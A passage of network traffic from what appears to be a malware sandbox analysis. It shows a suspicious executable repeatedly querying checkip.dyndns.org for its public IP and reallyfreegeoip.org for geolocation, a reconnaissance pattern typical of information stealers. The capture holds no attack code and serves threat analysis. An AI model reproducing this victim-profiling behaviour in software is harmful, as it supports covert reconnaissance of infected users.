                          Oct 23, 2024 16:01:33.690742016 CEST | 151 | OUT | GET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Connection: Keep-Alive
                          Oct 23, 2024 16:01:34.278034925 CEST | 323 | IN | HTTP/1.1 200 OK
                          Date: Wed, 23 Oct 2024 14:01:34 GMT
                          Content-Type: text/html
                          Content-Length: 106
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: 27b89f50fd9bdabcd77f7f106bb65ca9
                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>
                          Oct 23, 2024 16:01:34.285537958 CEST | 127 | OUT | GET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Oct 23, 2024 16:01:34.442698956 CEST | 323 | IN | HTTP/1.1 200 OK
                          Date: Wed, 23 Oct 2024 14:01:34 GMT
                          Content-Type: text/html
                          Content-Length: 106
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: e4909db3900ade3349ac57f8afb0e991
                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>
                          Oct 23, 2024 16:01:35.428318977 CEST | 127 | OUT | GET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Oct 23, 2024 16:01:35.586070061 CEST | 323 | IN | HTTP/1.1 200 OK
                          Date: Wed, 23 Oct 2024 14:01:35 GMT
                          Content-Type: text/html
                          Content-Length: 106
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: d5de3491bb87663073b562fc4c958446
                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>


                          | Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
                          |---|---|---|---|---|---|---|
                          | 1 | 192.168.2.5 | 49710 | 193.122.130.0 | 80 | 4304 | C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe |
                          Timestamp | Bytes transferred | Direction | Data
                          Oct 23, 2024 16:01:36.372581005 CEST | 127 | OUT | GET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Oct 23, 2024 16:01:37.046224117 CEST | 323 | IN | HTTP/1.1 200 OK
                          Date: Wed, 23 Oct 2024 14:01:36 GMT
                          Content-Type: text/html
                          Content-Length: 106
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: 2f6186f3d95683ac9a7d5d146833e766
                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>


                          | Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
                          |---|---|---|---|---|---|---|
                          | 2 | 192.168.2.5 | 49713 | 193.122.130.0 | 80 | 4304 | C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe |
                          Timestamp | Bytes transferred | Direction | Data
                          Oct 23, 2024 16:01:37.832098007 CEST | 127 | OUT | GET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Oct 23, 2024 16:01:38.509852886 CEST | 323 | IN | HTTP/1.1 200 OK
                          Date: Wed, 23 Oct 2024 14:01:38 GMT
                          Content-Type: text/html
                          Content-Length: 106
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: 60bbe985eb7b6b6d05caab68ad43fc0b
                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>


                          | Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
                          |---|---|---|---|---|---|---|
                          | 3 | 192.168.2.5 | 49716 | 193.122.130.0 | 80 | 4304 | C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe |
                          Timestamp | Bytes transferred | Direction | Data
                          Oct 23, 2024 16:01:39.309393883 CEST | 151 | OUT | GET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Connection: Keep-Alive
                          Oct 23, 2024 16:01:39.985116005 CEST | 323 | IN | HTTP/1.1 200 OK
                          Date: Wed, 23 Oct 2024 14:01:39 GMT
                          Content-Type: text/html
                          Content-Length: 106
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: d860c37a26ff99b89f0e41d79573aa4a
                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>


                          | Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
                          |---|---|---|---|---|---|---|
                          | 4 | 192.168.2.5 | 49718 | 193.122.130.0 | 80 | 4304 | C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe |
                          Timestamp | Bytes transferred | Direction | Data
                          Oct 23, 2024 16:01:41.003918886 CEST | 151 | OUT | GET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Connection: Keep-Alive
                          Oct 23, 2024 16:01:41.658071041 CEST | 323 | IN | HTTP/1.1 200 OK
                          Date: Wed, 23 Oct 2024 14:01:41 GMT
                          Content-Type: text/html
                          Content-Length: 106
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: 4a26cb2c3702aac8c8ebe9850a7b5ac8
                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>


                          | Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
                          |---|---|---|---|---|---|---|
                          | 5 | 192.168.2.5 | 49720 | 193.122.130.0 | 80 | 4304 | C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe |
                          Timestamp | Bytes transferred | Direction | Data
                          Oct 23, 2024 16:01:42.424170971 CEST | 151 | OUT | GET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Connection: Keep-Alive
                          Oct 23, 2024 16:01:43.090066910 CEST | 323 | IN | HTTP/1.1 200 OK
                          Date: Wed, 23 Oct 2024 14:01:43 GMT
                          Content-Type: text/html
                          Content-Length: 106
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: eeddddf6f76342e6f872cd82b2032d4e
                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>


                          | Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
                          |---|---|---|---|---|---|---|
                          | 6 | 192.168.2.5 | 49722 | 193.122.130.0 | 80 | 4304 | C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe |
                          Timestamp | Bytes transferred | Direction | Data
                          Oct 23, 2024 16:01:43.869554043 CEST | 151 | OUT | GET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Connection: Keep-Alive
                          Oct 23, 2024 16:01:44.558108091 CEST | 323 | IN | HTTP/1.1 200 OK
                          Date: Wed, 23 Oct 2024 14:01:44 GMT
                          Content-Type: text/html
                          Content-Length: 106
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: dcfd078eff42214ae6584f2894c93855
                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          0 | 192.168.2.5 | 49707 | 188.114.97.3 | 443 | 4304 | C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe
                          Timestamp | Bytes transferred | Direction | Data
                          2024-10-23 14:01:35 UTC | 87 | OUT | GET /xml/173.254.250.90 HTTP/1.1
                          Host: reallyfreegeoip.org
                          Connection: Keep-Alive
                          2024-10-23 14:01:35 UTC | 900 | IN | HTTP/1.1 200 OK
                          Date: Wed, 23 Oct 2024 14:01:35 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: HIT
                          Age: 28031
                          Last-Modified: Wed, 23 Oct 2024 06:14:24 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=En%2Fe7bdFia2PHATeykmmLsfUo7sJ7c8gxX9EeGGD1ZfPKJx%2F75DZd%2BWXDpV8VfUzSsf6O3%2FivEG9YHlAT%2FmjG4f74iptTnFzjV%2B0IygSMLxDoq0wFh36YWr3vz8VnO3kgOtXn378"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8d72428b496045e4-DFW
                          alt-svc: h3=":443"; ma=86400
                          server-timing: cfL4;desc="?proto=TCP&rtt=1088&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2576512&cwnd=250&unsent_bytes=0&cid=7666d180dd736552&ts=249&x=0"
                          2024-10-23 14:01:35 UTC | 366 | IN | Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                          Data Ascii: 167<Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                          2024-10-23 14:01:35 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          1 | 192.168.2.5 | 49709 | 188.114.97.3 | 443 | 4304 | C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe
                          Timestamp | Bytes transferred | Direction | Data
                          2024-10-23 14:01:36 UTC | 63 | OUT | GET /xml/173.254.250.90 HTTP/1.1
                          Host: reallyfreegeoip.org
                          2024-10-23 14:01:36 UTC | 900 | IN | HTTP/1.1 200 OK
                          Date: Wed, 23 Oct 2024 14:01:36 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: HIT
                          Age: 28032
                          Last-Modified: Wed, 23 Oct 2024 06:14:24 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b4JeRyb5Ykm5K%2FZJzNzs%2B3GPl5TLAU3ZEQBAJgKyqdcohAYTiXno3Qce6aBAIVXg2d4pkLKLa%2FamkubORKBnX8zTGTKDIjBgSTmjWIdSTZ%2BsV%2BHIYAYPAOqf%2B7QBY9bH4VBV70gc"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8d724291cf820c46-DFW
                          alt-svc: h3=":443"; ma=86400
                          server-timing: cfL4;desc="?proto=TCP&rtt=1210&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2282111&cwnd=251&unsent_bytes=0&cid=5bdbb202f845848b&ts=153&x=0"
                          2024-10-23 14:01:36 UTC | 366 | IN | Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                          Data Ascii: 167<Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                          2024-10-23 14:01:36 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          2 | 192.168.2.5 | 49712 | 188.114.97.3 | 443 | 4304 | C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe
                          Timestamp | Bytes transferred | Direction | Data
                          2024-10-23 14:01:37 UTC | 87 | OUT | GET /xml/173.254.250.90 HTTP/1.1
                          Host: reallyfreegeoip.org
                          Connection: Keep-Alive
                          2024-10-23 14:01:37 UTC | 898 | IN | HTTP/1.1 200 OK
                          Date: Wed, 23 Oct 2024 14:01:37 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: HIT
                          Age: 28033
                          Last-Modified: Wed, 23 Oct 2024 06:14:24 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vZCiMyHJ%2FINgNq%2F7R7ubLoQQaKJ3sS%2Bx3gLyZf7sML%2BWy9pCV5idiShRHoIA2yUXogun2Eyqk9kovJRO%2F5QJ5tvPK17Qo4HDra35TSBX2XAq3IqHVVKart9ygwgqMDcqNDxey6ir"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8d72429adcd4e8f5-DFW
                          alt-svc: h3=":443"; ma=86400
                          server-timing: cfL4;desc="?proto=TCP&rtt=1623&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1745629&cwnd=251&unsent_bytes=0&cid=df807287f36d2861&ts=156&x=0"
                          2024-10-23 14:01:37 UTC | 366 | IN | Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                          Data Ascii: 167<Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                          2024-10-23 14:01:37 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          3 | 192.168.2.5 | 49715 | 188.114.97.3 | 443 | 4304 | C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe
                          Timestamp | Bytes transferred | Direction | Data
                          2024-10-23 14:01:39 UTC | 87 | OUT | GET /xml/173.254.250.90 HTTP/1.1
                          Host: reallyfreegeoip.org
                          Connection: Keep-Alive
                          2024-10-23 14:01:39 UTC | 898 | IN | HTTP/1.1 200 OK
                          Date: Wed, 23 Oct 2024 14:01:39 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: HIT
                          Age: 28035
                          Last-Modified: Wed, 23 Oct 2024 06:14:24 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B60gdqrpyQKpEbNq6%2FZUV2zRLA0x10%2FK54OXXhG0AVsopjoclekqpYx8AkQx4Nu3JtrSeBhqafA5zLC6j%2FRSyZNVyaqqYRffptIG5sZzgIWR8Q1g%2Bgfj6FWP4vjkVBaQb1n%2FTjWR"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8d7242a42c8fe7a6-DFW
                          alt-svc: h3=":443"; ma=86400
                          server-timing: cfL4;desc="?proto=TCP&rtt=1919&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1551982&cwnd=251&unsent_bytes=0&cid=7f11ba9ef345180e&ts=158&x=0"
                          2024-10-23 14:01:39 UTC | 366 | IN | Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                          Data Ascii: 167<Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                          2024-10-23 14:01:39 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          4 | 192.168.2.5 | 49717 | 188.114.97.3 | 443 | 4304 | C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe
                          Timestamp | Bytes transferred | Direction | Data
                          2024-10-23 14:01:40 UTC | 87 | OUT | GET /xml/173.254.250.90 HTTP/1.1
                          Host: reallyfreegeoip.org
                          Connection: Keep-Alive
                          2024-10-23 14:01:40 UTC | 900 | IN | HTTP/1.1 200 OK
                          Date: Wed, 23 Oct 2024 14:01:40 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: HIT
                          Age: 28036
                          Last-Modified: Wed, 23 Oct 2024 06:14:24 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QuZlH1GSG6G1E2TYOqA5al8AaT3afPPJUCJ%2BHeRNJHbUsk2TZqOluAg4XZ%2BxBxVXREs7Ag8qkbkFmIgh9zuz0ado%2FhTHk35QGMzsAgHtWnOubcEuPPxcB%2FttS%2BLeXM2%2BpxluMyKa"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8d7242ad5d1c2e72-DFW
                          alt-svc: h3=":443"; ma=86400
                          server-timing: cfL4;desc="?proto=TCP&rtt=1568&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1846938&cwnd=219&unsent_bytes=0&cid=88eae73ad715b114&ts=188&x=0"
                          2024-10-23 14:01:40 UTC | 366 | IN | Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                          Data Ascii: 167<Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                          2024-10-23 14:01:40 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          5 | 192.168.2.5 | 49719 | 188.114.97.3 | 443 | 4304 | C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe
                          Timestamp | Bytes transferred | Direction | Data
                          2024-10-23 14:01:42 UTC | 63 | OUT | GET /xml/173.254.250.90 HTTP/1.1
                          Host: reallyfreegeoip.org
                          2024-10-23 14:01:42 UTC | 900 | IN | HTTP/1.1 200 OK
                          Date: Wed, 23 Oct 2024 14:01:42 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
